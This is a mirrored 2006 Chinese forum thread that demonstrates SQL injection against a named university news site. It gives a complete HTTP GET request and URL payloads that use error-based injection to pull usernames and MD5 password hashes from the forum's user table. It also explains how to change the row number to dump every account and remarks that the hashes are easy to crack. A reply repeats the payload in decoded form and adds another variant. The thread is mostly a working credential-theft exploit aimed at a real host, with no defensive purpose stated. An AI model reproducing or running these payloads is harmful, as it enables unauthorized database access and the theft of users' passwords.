返回信息流找到注入点
http://www.byr.edu.cn/news/shownews.asp?id=4129
Socket提交
GET /news/shownews.asp?id=4129%20And%20char(124)%2B(Select%20Top%201%20isNull(cast([username]%20as%20varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([password]%20as%20varchar(8000)),char(32))%2Bchar(124)%20From%20(Select%20Top%2049%20[username],[password]%20From%20[SecondHand]..[byrforum_userdb]%20Where%201=1%20Order%20by%20[username],[password])%20T%20Order%20by%20[username]%20desc,[password]%20desc)>0 HTTP/1.1
User-Agent: Internet Explorer 6.0
Host: www.byr.edu.cn
Cookie: ASPSESSIONIDACSBBTCQ=IDNFEDLBGKNBNHGHODLINIMF
把Select%20Top%2049%20[username],[password]%20From%20[SecondHand]
这里的%2049里面的49改成1-22000其它值,提交后,得到结果,搜索"Microsoft OLE DB Provider for SQL Server (0x80040E07)"字符串
后面就是相应用户的用户名和密码
这里的用户名和密码是前北邮人论坛的.
密码是MD5序列.破解方法很多啦!
这是一条镜像帖。来源:北邮人论坛 / soft-design / #5236同步于 2006/3/29
该镜像源已超过 30 天没有更新,可能在源站已被删除。
SoftDesign机器人发帖
SQL注入北邮人新闻系统
Lonhero
2006/3/29镜像同步2 回复
订阅后,新回复会通过你的通知中心匿名送达。
2 条回复
帮楼主贴上解释版
http://www.byr.edu.cn/news/shownews.asp?id=4129 And char(124)+(Select Top 1 isNull(cast([username] as varchar(8000)),char(32))+char(124)+isNull(cast([password] as varchar(8000)),char(32))+char(124) From (Select Top 24 [username],[password] From [SecondHand]..[byrforum_userdb] Where 1=1 Order by [username],[password]) T Order by [username] desc,[password] desc)>0
http://www.byr.edu.cn/news/shownews.asp?id=4129%20And%20char(124)%2B(Select%20Top%201%20isNull(cast([username]%20as%20varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([password]%20as%20varchar(8000)),char(32))%2Bchar(124)%20From%20(Select%20Top%205000%20[username],[password]%20From%20[SecondHand]..[byrforum_userdb]%20Where%201=1%20Order%20by%20[username],[password])%20T%20Order%20by%20[username]%20desc,[password]%20desc)>0